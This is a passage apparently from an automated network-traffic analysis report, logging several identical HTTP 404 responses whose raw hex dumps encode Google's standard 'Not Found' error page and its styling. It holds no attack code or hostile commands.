70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:29:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:29:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:29:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:29:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:29:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:29:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 